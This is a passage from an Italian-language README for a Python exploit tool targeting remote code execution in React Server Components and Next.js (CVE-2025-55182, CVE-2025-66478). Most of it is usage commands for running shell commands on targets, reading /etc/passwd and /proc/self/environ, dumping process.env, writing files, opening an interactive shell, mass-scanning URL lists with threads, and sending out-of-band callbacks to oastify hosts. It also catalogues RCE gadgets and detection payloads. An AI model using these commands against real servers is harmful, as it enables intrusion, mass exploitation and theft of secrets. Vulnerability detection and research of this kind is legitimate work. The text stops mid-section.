CVE-2025-55182 - Exploit RCE per React Server Components v2.0
Uno strumento completo di ricerca sulla sicurezza per testare le vulnerabilità CVE-2025-55182 e CVE-2025-66478 in React Server Components (RSC) e Next.js Server Actions.
Panoramica della vulnerabilità
| Proprietà | Valore |
|---|
| ID CVE | CVE-2025-55182, CVE-2025-66478 |
| Punteggio CVSS | 10.0 (CRITICO) |
| Versioni interessate | React < 19.2.0, Next.js < 15.0.5 |
| Tipo di vulnerabilità | Esecuzione remota di codice (RCE) |
| Vettore di attacco | Rete |
Funzionalità
- Scansione delle vulnerabilità in stile PortSwigger con molteplici payload di rilevamento
- Molteplici gadget RCE (execSync, spawnSync, vm.runInThisContext, ecc.)
- Test dei callback Out-of-Band (OOB) per la verifica di RCE cieca
- Capacità di lettura/scrittura di file
- Esecuzione di codice JavaScript
- Modalità shell interattiva
- Scansione di massa con multi-threading
- Supporto proxy (compatibile con Burp Suite)
- Formati di output JSON/Testo
Installazione
Requisiti
pip install requests
Versione Python
Avvio rapido
# Basic vulnerability check
python3 exploit-custom.py -u https://target.com --check
# Full vulnerability scan (recommended)
python3 exploit-custom.py -u https://target.com --scan
# With proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# OOB callback test
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com
# Command execution
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Interactive shell
python3 exploit-custom.py -u https://target.com --shell
Utilizzo
Argomenti della riga di comando
usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
[-H HEADER] [-t THREADS] [--timeout TIMEOUT]
[--check] [--detect] [--scan] [--test-all]
[--oob HOST] [--cmd CMD] [--gadget GADGET]
[--read FILE] [--write FILE CONTENT] [--js JS]
[--shell] [-o OUTPUT] [-q]
Selezione del target
| Argomento | Descrizione | Esempio |
|---|
-u, --url | URL del singolo target | -u https://target.com |
-l, --list | File contenente gli URL | -l targets.txt |
Modalità di scansione
| Argomento | Descrizione |
|---|
--detect | Rileva l'uso di Next.js/RSC |
--check | Verifica rapida della vulnerabilità (test matematico) |
--scan | Scansione completa della vulnerabilità (stile PortSwigger) |
--test-all | Testa tutti i gadget e i payload di rilevamento |
Sfruttamento
| Argomento | Descrizione | Esempio |
|---|
--cmd | Esegue un comando shell | --cmd "id" |
--gadget | Specifica il gadget da utilizzare | --gadget execSync |
--read | Legge un file dal target | --read /etc/passwd |
--write | Scrive un file sul target | --write /tmp/test.txt "content" |
--js | Esegue codice JavaScript | --js "process.env" |
--shell | Avvia una shell interattiva | --shell |
--oob | Host di callback OOB | --oob xyz.oastify.com |
Opzioni di connessione
| Argomento | Descrizione | Esempio |
|---|
-p, --proxy | Proxy HTTP/HTTPS | -p http://127.0.0.1:8080 |
-c, --cookies | Stringa dei cookie | -c "session=abc123" |
-H, --header | Header aggiuntivo (ripetibile) | -H "X-Custom: value" |
-t, --threads | Numero di thread per la scansione di massa | -t 20 |
--timeout | Timeout della richiesta in secondi | --timeout 60 |
Opzioni di output
| Argomento | Descrizione |
|---|
-o, --output | Salva i risultati in un file (.json o .txt) |
-q, --quiet | Sopprime il banner |
Esempi di scansione
Target singolo
# Detect Next.js and RSC
python3 exploit-custom.py -u https://target.com --detect
# Quick vulnerability check
python3 exploit-custom.py -u https://target.com --check
# Full scan with all detection payloads
python3 exploit-custom.py -u https://target.com --scan
# Test all gadgets with OOB verification
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com
Scansione di massa
# Scan multiple targets
python3 exploit-custom.py -l targets.txt --scan -o results.json
# With increased threads
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json
# With OOB callbacks
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json
Esempi di sfruttamento
Esecuzione di comandi
# Using default gadget (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Using specific gadget
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync
Operazioni sui file
# Read file
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ
# Write file
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"
Esecuzione di JavaScript
# Get environment variables
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"
# Get hostname
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"
# List directory
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"
Shell interattiva
python3 exploit-custom.py -u https://target.com --shell
Comandi della shell:
| Comando | Descrizione |
|---|
<command> | Esegue un comando shell |
!read <file> | Legge un file |
!write <file> <content> | Scrive un file |
!js <code> | Esegue JavaScript |
!gadget <name> | Cambia gadget |
exit | Esce dalla shell |
Gadget disponibili
Gadget RCE
| Nome | ID modulo | Descrizione |
|---|
execSync | child_process#execSync | Esecuzione diretta di comandi shell |
execFileSync | child_process#execFileSync | Esegue un file binario |
spawnSync | child_process#spawnSync | Avvia un processo con argomenti |
vm_runInThisContext | vm#runInThisContext | Esegue JS nel contesto corrente |
vm_runInNewContext | vm#runInNewContext | Esegue JS con evasione dalla sandbox |
vm_runInThisContext_global | vm#runInThisContext | Esegue tramite global.process |
Gadget per file
| Nome | ID modulo | Descrizione |
|---|
fs_readFileSync | fs#readFileSync | Legge file arbitrari |
fs_writeFileSync | fs#writeFileSync | Scrive file arbitrari |
Gadget OOB
| Nome | Descrizione |
|---|
vm_fetch | Richiesta HTTP tramite API fetch (Node 18+) |
vm_http | Richiesta HTTP tramite modulo http |
Payload di rilevamento (CVE-2025-66478)
La modalità --scan utilizza questi payload di rilevamento in stile PortSwigger:
| Payload | Descrizione |
|---|
property_reference | Riferimento di proprietà delimitato da due punti ["$1:a:a"] |
property_reference_v2 | Riferimento alternativo ["$1:b:b"] |
property_reference_constructor | Accesso al costruttore tramite riferimento di proprietà |
property_reference_proto | Accesso alla catena proto tramite riferimento di proprietà |
action_ref_vm | ACTION_REF con vm#runInThisContext |
action_ref_execSync | ACTION_REF con child_process#execSync |
Metodi di callback OOB
Lo strumento supporta molteplici metodi di callback OOB: